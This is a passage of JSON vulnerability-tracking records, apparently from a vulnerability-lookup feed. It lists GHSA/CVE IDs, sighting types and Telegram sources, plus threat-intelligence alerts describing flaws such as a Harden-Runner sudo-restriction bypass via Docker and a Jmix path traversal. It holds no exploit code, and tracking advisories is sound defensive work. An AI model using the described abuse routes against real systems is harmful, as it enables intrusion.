\u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e \u043f\u043e 631 \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u043f\u043e\u0440\u0442\u0443;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 SIEM-\u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043b\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 localhost;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f.\n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:\nhttps://github.com/OpenPrinting/cups/security/advisories/GHSA-c54j-2vqw-wpwp", "creation_timestamp": "2026-04-08T14:52:46.000000Z"}, {"uuid": "e157228f-b568-459c-9be7-72966abfc4f3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MXR3-8WHJ-J74R", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12760", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32955\n\ud83d\udd25 CVSS Score: 6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H)\n\ud83d\udd39 Description: Harden-Runner is a CI/CD security agent that works like an EDR for GitHub Actions runners. Versions from 0.12.0 to before 2.12.0 are vulnerable to `disable-sudo` bypass. Harden-Runner includes a policy option `disable-sudo` to prevent the GitHub Actions runner user from using sudo. This is implemented by removing the runner user from the sudoers file. However, this control can be bypassed as the runner user, being part of the docker group, can interact with the Docker daemon to launch privileged containers or access the host filesystem. This allows the attacker to regain root access or restore the sudoers file, effectively bypassing the restriction. This issue has been patched in version 2.12.0.\n\ud83d\udccf Published: 2025-04-21T20:45:58.105Z\n\ud83d\udccf Modified: 2025-04-21T20:45:58.105Z\n\ud83d\udd17 References:\n1. https://github.com/step-security/harden-runner/security/advisories/GHSA-mxr3-8whj-j74r\n2. https://github.com/step-security/harden-runner/commit/0634a2670c59f64b4a01f0f96f84700a4088b9f0\n3. https://github.com/step-security/harden-runner/releases/tag/v2.12.0", "creation_timestamp": "2025-04-21T21:02:34.000000Z"}, {"uuid": "6001f049-fbfc-4e1a-8d0d-450a7938a9fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "RHSA-2026:2363", "type": "seen", "source": "https://t.me/securixy_kz/1317", "content": "", "creation_timestamp": "2026-07-12T22:00:05.923051Z"}, {"uuid": "299dd0dc-a728-4afc-b592-d5007cf2c948", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J3G3-5QV5-52MJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13695", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43857\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Net::IMAP implements Internet Message Access Protocol (IMAP) client functionality in Ruby. Prior to versions 0.5.7, 0.4.20, 0.3.9, and 0.2.5, there is a possibility for denial of service by memory exhaustion when net-imap reads server responses. At any time while the client is connected, a malicious server can send can send a \"literal\" byte count, which is automatically read by the client's receiver thread. The response reader immediately allocates memory for the number of bytes indicated by the server response. This should not be an issue when securely connecting to trusted IMAP servers that are well-behaved. It can affect insecure connections and buggy, untrusted, or compromised servers (for example, connecting to a user supplied hostname). This issue has been patched in versions 0.5.7, 0.4.20, 0.3.9, and 0.2.5.\n\ud83d\udccf Published: 2025-04-28T16:02:04.459Z\n\ud83d\udccf Modified: 2025-04-28T16:02:04.459Z\n\ud83d\udd17 References:\n1. https://github.com/ruby/net-imap/security/advisories/GHSA-j3g3-5qv5-52mj\n2. https://github.com/ruby/net-imap/pull/442\n3. https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462\n4. https://github.com/ruby/net-imap/pull/445\n5. https://github.com/ruby/net-imap/pull/446\n6. https://github.com/ruby/net-imap/pull/447", "creation_timestamp": "2025-04-28T16:11:07.000000Z"}, {"uuid": "668f8751-7e10-40b9-8179-f60b6bae933c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JHGQ-CX3F-VJ5P", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13698", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43854\n\ud83d\udd25 CVSS Score: 2.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: DIFY is an open-source LLM app development platform. Prior to version 1.3.0, a clickjacking vulnerability was found in the default setup of the DIFY application, allowing malicious actors to trick users into clicking on elements of the web page without their knowledge or consent. This can lead to unauthorized actions being performed, potentially compromising the security and privacy of users. This issue has been fixed in version 1.3.0.\n\ud83d\udccf Published: 2025-04-28T15:58:54.689Z\n\ud83d\udccf Modified: 2025-04-28T15:58:54.689Z\n\ud83d\udd17 References:\n1. https://github.com/langgenius/dify/security/advisories/GHSA-jhgq-cx3f-vj5p\n2. https://github.com/langgenius/dify/pull/18516", "creation_timestamp": "2025-04-28T16:11:09.000000Z"}, {"uuid": "db0d2fb0-e69c-4b99-ba55-fa495a47ae9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JPCQ-CGW6-V4J6", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "5d5bb61a-056b-4ae2-bc6c-643678e770e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXR4-XJJ5-5PX2", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "6afe27f2-99e6-4bc6-a4c1-a63e97a6f03c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PJ7M-G53M-7638", "type": "seen", "source": "Telegram/KQJ2fokDRUpEEMEdtilLJpNYW94QEwCQWFCqP7BH6XiY", "content": "", "creation_timestamp": "2024-09-12T10:16:41.000000Z"}, {"uuid": "677cccaf-94a5-4cb2-ab8d-aae0793fb82f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VQXF-84PH-J3VX", "type": "published-proof-of-concept", "source": "Telegram/x6U1CUbtpfWdw00zGhzow4OOkK7AiEHUVbiM6o3SMYH6zs0", "content": "", "creation_timestamp": "2026-04-16T23:18:23.000000Z"}, {"uuid": "3ab852db-a21a-4e38-b6a2-b84b025ffb91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-353C-V8X9-V7C3", "type": "published-proof-of-concept", "source": "Telegram/x6U1CUbtpfWdw00zGhzow4OOkK7AiEHUVbiM6o3SMYH6zs0", "content": "", "creation_timestamp": "2026-04-16T23:18:23.000000Z"}, {"uuid": "603f271e-38e1-41f1-927b-d995cd4cd0db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PC3F-X583-G7J2", "type": "published-proof-of-concept", "source": "Telegram/x6U1CUbtpfWdw00zGhzow4OOkK7AiEHUVbiM6o3SMYH6zs0", "content": "", "creation_timestamp": "2026-04-16T23:18:23.000000Z"}, {"uuid": "a7b3aacd-f986-40ff-a3bf-98649a0456aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F523-465F-8C8F", "type": "published-proof-of-concept", "source": "Telegram/x6U1CUbtpfWdw00zGhzow4OOkK7AiEHUVbiM6o3SMYH6zs0", "content": "", "creation_timestamp": "2026-04-16T23:18:23.000000Z"}, {"uuid": "5498d8a0-e0eb-41d8-b415-29b881b06066", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G9CW-QWHF-24JP", "type": "published-proof-of-concept", "source": "Telegram/uUtOgPMgnfpzQaGdgE5uvRP8Wc5_QVkmzi4lAg5HL6Ws0-I", "content": "", "creation_timestamp": "2026-04-16T23:18:29.000000Z"}, {"uuid": "c730d770-ae6a-4a24-81ab-ac897a8f13c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MVX-F5QM-V2CH", "type": "published-proof-of-concept", "source": "Telegram/uUtOgPMgnfpzQaGdgE5uvRP8Wc5_QVkmzi4lAg5HL6Ws0-I", "content": "", "creation_timestamp": "2026-04-16T23:18:29.000000Z"}, {"uuid": "6d38ae94-d9aa-4ddd-96be-15a9944e6a49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X5R2-R74C-3W28", "type": "published-proof-of-concept", "source": "Telegram/uUtOgPMgnfpzQaGdgE5uvRP8Wc5_QVkmzi4lAg5HL6Ws0-I", "content": "", "creation_timestamp": "2026-04-16T23:18:29.000000Z"}, {"uuid": "6b18e0c6-7a23-46a5-a504-d22dc3a233e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JGQ2-QV8V-5CMJ", "type": "published-proof-of-concept", "source": "Telegram/uUtOgPMgnfpzQaGdgE5uvRP8Wc5_QVkmzi4lAg5HL6Ws0-I", "content": "", "creation_timestamp": "2026-04-16T23:18:29.000000Z"}, {"uuid": "d2d699d5-05df-4a8c-963f-70c818db51c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JVRJ-W5HQ-6CP2", "type": "published-proof-of-concept", "source": "Telegram/8eXn4QLj3W1_8AYc2pIsiDgfSWsuolTpz1YwE008yOgTXtw", "content": "", "creation_timestamp": "2026-04-07T17:29:14.000000Z"}, {"uuid": "e668b861-b084-4945-b1dd-0765d773c305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C854-FFG9-G72C", "type": "seen", "source": "Telegram/7o25spvsi10qoVsYDQCR4BvQZf2Pb0MXjY1dtOy-qDOy7tc", "content": "", "creation_timestamp": "2026-04-14T23:22:03.000000Z"}, {"uuid": "a4476b0a-fa9c-4979-b9c4-db5ff5ac6d83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XGM-4X47-2X2P", "type": "seen", "source": "Telegram/7o25spvsi10qoVsYDQCR4BvQZf2Pb0MXjY1dtOy-qDOy7tc", "content": "", "creation_timestamp": "2026-04-14T23:22:03.000000Z"}, {"uuid": "f944acfd-9d02-4183-a21e-4e07fd3ae3c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X373-8J9J-G5PJ", "type": "seen", "source": "Telegram/7o25spvsi10qoVsYDQCR4BvQZf2Pb0MXjY1dtOy-qDOy7tc", "content": "", "creation_timestamp": "2026-04-14T23:22:03.000000Z"}, {"uuid": "12afae7d-ec05-4472-8d6a-02eea94df83c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7PHX-W897-4C9X", "type": "published-proof-of-concept", "source": "Telegram/70ang71mEb6lYSNq2VZHiuuV7i7KfipPcLMkKo_Gk9-znXQ", "content": "", "creation_timestamp": "2026-04-14T23:22:29.000000Z"}, {"uuid": "e3422262-dc57-4dd6-a954-98ef1b42cf92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V9WW-2J6R-98Q6", "type": "seen", "source": "Telegram/s117pb2GT3VwdfXaV13Oi8Gqr-ePRy_I5oBJZVU7ek3MbpQ", "content": "", "creation_timestamp": "2026-04-16T17:20:51.000000Z"}, {"uuid": "41be55b1-b0ae-46fd-bd3f-56f936673210", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MRQG-XMGM-RC5G", "type": "seen", "source": "Telegram/s117pb2GT3VwdfXaV13Oi8Gqr-ePRy_I5oBJZVU7ek3MbpQ", "content": "", "creation_timestamp": "2026-04-16T17:20:51.000000Z"}, {"uuid": "e3760c3b-b1e6-4268-ac18-bf3e8130f3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P2GH-CFQ4-4WJC", "type": "published-proof-of-concept", "source": "Telegram/YKX-6KXVqHKUWR-VRt4uZwi-aDyDZ2w2e-w4Y4gyD3o3fyw", "content": "", "creation_timestamp": "2026-04-16T17:21:05.000000Z"}, {"uuid": "d91aab88-acc0-4b68-a6b2-d9a3f6aa9698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F443-95CF-M837", "type": "published-proof-of-concept", "source": "Telegram/MfR_D7ll8pGcGi3RGemlsgII30sQ-Y2l5bpdSqMK2BdYlKE", "content": "", "creation_timestamp": "2026-04-17T05:18:08.000000Z"}, {"uuid": "c8ac8ef4-3949-4125-a862-d3cca8b73f82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4852-V58G-6CWF", "type": "published-proof-of-concept", "source": "Telegram/MfR_D7ll8pGcGi3RGemlsgII30sQ-Y2l5bpdSqMK2BdYlKE", "content": "", "creation_timestamp": "2026-04-17T05:18:08.000000Z"}, {"uuid": "9077a11d-95e0-480d-b293-d07867db2477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XXPW-2C8Q-G693", "type": "published-proof-of-concept", "source": "Telegram/MfR_D7ll8pGcGi3RGemlsgII30sQ-Y2l5bpdSqMK2BdYlKE", "content": "", "creation_timestamp": "2026-04-17T05:18:08.000000Z"}, {"uuid": "9569def0-d57f-4f1b-8761-a4bd930d636a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67CG-CPJ7-QGC9", "type": "published-proof-of-concept", "source": "Telegram/MfR_D7ll8pGcGi3RGemlsgII30sQ-Y2l5bpdSqMK2BdYlKE", "content": "", "creation_timestamp": "2026-04-17T05:18:08.000000Z"}, {"uuid": "ff76a9eb-b769-4d93-8283-02df753af8ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJW3-73Q9-V2QH", "type": "published-proof-of-concept", "source": "Telegram/xKxKUYX0BRejEqYlrURXsjCQY9BctYcoeewN_mSMWqY7riM", "content": "", "creation_timestamp": "2026-04-06T21:21:26.000000Z"}, {"uuid": "d05fc34c-4d7e-4ec9-896e-ef3bfabcbd4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3676-WJ6R-HWH7", "type": "published-proof-of-concept", "source": "Telegram/xKxKUYX0BRejEqYlrURXsjCQY9BctYcoeewN_mSMWqY7riM", "content": "", "creation_timestamp": "2026-04-06T21:21:26.000000Z"}, {"uuid": "f17c070b-812a-43ea-a0c9-b55295bd236a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPF3-FXWG-CWR3", "type": "published-proof-of-concept", "source": "Telegram/xKxKUYX0BRejEqYlrURXsjCQY9BctYcoeewN_mSMWqY7riM", "content": "", "creation_timestamp": "2026-04-06T21:21:26.000000Z"}, {"uuid": "c0871124-5833-432d-b625-ed5ec1d3c9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MXC9-9335-45MC", "type": "published-proof-of-concept", "source": "Telegram/vFalP9cCg-kFoPrSdHM4ZH4qnLHRdngXJ_Cuq8FbW2RkF4k", "content": "", "creation_timestamp": "2026-04-14T23:21:40.000000Z"}, {"uuid": "5aa7ac21-a5af-467c-b3cc-d9869aeffbc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-789Q-PW85-J2Q2", "type": "published-proof-of-concept", "source": "Telegram/vFalP9cCg-kFoPrSdHM4ZH4qnLHRdngXJ_Cuq8FbW2RkF4k", "content": "", "creation_timestamp": "2026-04-14T23:21:40.000000Z"}, {"uuid": "2f49150e-6a7e-4729-b8ca-eae6ce4b7a42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W8C4-C7R8-QGW2", "type": "published-proof-of-concept", "source": "Telegram/vFalP9cCg-kFoPrSdHM4ZH4qnLHRdngXJ_Cuq8FbW2RkF4k", "content": "", "creation_timestamp": "2026-04-14T23:21:40.000000Z"}, {"uuid": "b282ff9b-1157-4e85-adc5-8a7eb61758a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GM5Q-G72W-C466", "type": "published-proof-of-concept", "source": "Telegram/x6U1CUbtpfWdw00zGhzow4OOkK7AiEHUVbiM6o3SMYH6zs0", "content": "", "creation_timestamp": "2026-04-16T23:18:23.000000Z"}, {"uuid": "e97fa0f5-6756-4a02-b243-1883443ea3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HFP-M9GV-M753", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12906", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-26138\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: The XWiki licensor application, which manages and enforce application licenses for paid extensions, includes the document `Licenses.Code.LicenseJSON` that provides information for admins regarding active licenses. This document is public and thus exposes this information publicly. The information includes the instance's id as well as first and last name and email of the license owner. This is a leak of information that isn't supposed to be public. The instance id allows associating data on the active installs data with the concrete XWiki instance. Active installs assures that \"there's no way to find who's having a given UUID\" (referring to the instance id). Further, the information who the license owner is and information about the obtained licenses can be used for targeted phishing attacks. Also, while user information is normally public, email addresses might only be displayed obfuscated,  depending on the configuration. This has been fixed in Application Licensing 1.24.2. There are no known workarounds besides upgrading.\n\ud83d\udccf Published: 2024-02-21T16:52:25.022Z\n\ud83d\udccf Modified: 2025-04-22T16:23:41.846Z\n\ud83d\udd17 References:\n1. https://github.com/xwikisas/application-licensing/security/advisories/GHSA-4hfp-m9gv-m753\n2. https://github.com/xwikisas/application-licensing/commit/d168fb88fc0d121bf95e769ea21c55c00bebe5a6\n3. https://extensions.xwiki.org/xwiki/bin/view/Extension/Active%20Installs%202%20API", "creation_timestamp": "2025-04-22T17:03:31.000000Z"}, {"uuid": "15220adb-51c8-4a44-bdf2-0585bf3a81bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JX4G-3XQM-62VH", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13457", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32950\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Jmix is a set of libraries and tools to speed up Spring Boot data-centric application development. In versions 1.0.0 to 1.6.1 and 2.0.0 to 2.3.4, attackers could manipulate the FileRef parameter to access files on the system where the Jmix application is deployed, provided the application server has the necessary permissions. This can be accomplished either by modifying the FileRef directly in the database or by supplying a harmful value in the fileRef parameter of the `/files` endpoint of the generic REST API. This issue has been patched in versions 1.6.2 and 2.4.0. A workaround is provided on the Jmix documentation website.\n\ud83d\udccf Published: 2025-04-22T17:14:43.211Z\n\ud83d\udccf Modified: 2025-04-25T16:03:22.669Z\n\ud83d\udd17 References:\n1. https://github.com/jmix-framework/jmix/security/advisories/GHSA-jx4g-3xqm-62vh\n2. https://docs.jmix.io/jmix/files-vulnerabilities.html\n3. https://docs.jmix.io/jmix/files-vulnerabilities.html#fix-path-traversal-in-jmix-application", "creation_timestamp": "2025-04-25T16:07:16.000000Z"}, {"uuid": "a07ad6df-8792-437c-82ab-86085ebfdec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QW93-H6PF-226X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13456", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32788\n\ud83d\udd25 CVSS Score: 4.3 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: OctoPrint provides a web interface for controlling consumer 3D printers. In versions up to and including 1.10.3, OctoPrint has a vulnerability that allows an attacker to bypass the login redirect and directly access the rendered HTML of certain frontend pages. The primary risk lies in potential future modifications to the codebase that might incorrectly rely on the vulnerable internal functions for authentication checks, leading to security vulnerabilities. This issue has been patched in version 1.11.0.\n\ud83d\udccf Published: 2025-04-22T17:14:39.690Z\n\ud83d\udccf Modified: 2025-04-25T16:03:30.506Z\n\ud83d\udd17 References:\n1. https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-qw93-h6pf-226x\n2. https://github.com/OctoPrint/OctoPrint/commit/41ff431014edfa18ca1a01897b10463934dc7fc2", "creation_timestamp": "2025-04-25T16:07:12.000000Z"}, {"uuid": "a948bbd4-6187-469b-94b8-927da7c5afd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3GV-CWWH-758M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13459", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32952\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Jmix is a set of libraries and tools to speed up Spring Boot data-centric application development. In versions 1.0.0 to 1.6.1 and 2.0.0 to 2.3.4, the local file storage implementation does not restrict the size of uploaded files. An attacker could exploit this by uploading excessively large files, potentially causing the server to run out of space and return HTTP 500 error, resulting in a denial of service. This issue has been patched in versions 1.6.2 and 2.4.0. A workaround is provided on the Jmix documentation website.\n\ud83d\udccf Published: 2025-04-22T17:32:11.966Z\n\ud83d\udccf Modified: 2025-04-25T16:03:04.176Z\n\ud83d\udd17 References:\n1. https://github.com/jmix-framework/jmix/security/advisories/GHSA-f3gv-cwwh-758m\n2. https://docs.jmix.io/jmix/files-vulnerabilities.html\n3. https://docs.jmix.io/jmix/files-vulnerabilities.html#disable-files-endpoint-in-jmix-application", "creation_timestamp": "2025-04-25T16:07:18.000000Z"}, {"uuid": "2ff12fe2-0e77-4759-bd25-e7a788dc1744", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M6V-Q233-Q9J9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13458", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32963\n\ud83d\udd25 CVSS Score: 6.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: MinIO Operator STS is a native IAM Authentication for Kubernetes. Prior to version 7.1.0, if no audiences are provided for the `spec.audiences` field, the default will be of the Kubernetes apiserver. Without scoping, it can be replayed to other internal systems, which may unintentionally trust it. This issue has been patched in version 7.1.0.\n\ud83d\udccf Published: 2025-04-22T17:14:56.958Z\n\ud83d\udccf Modified: 2025-04-25T16:03:14.020Z\n\ud83d\udd17 References:\n1. https://github.com/minio/operator/security/advisories/GHSA-7m6v-q233-q9j9\n2. https://github.com/minio/operator/releases/tag/v7.1.0", "creation_timestamp": "2025-04-25T16:07:17.000000Z"}, {"uuid": "fc730398-3523-42d0-a1bb-7b58d9009ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X27V-F838-JH93", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13460", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32951\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: 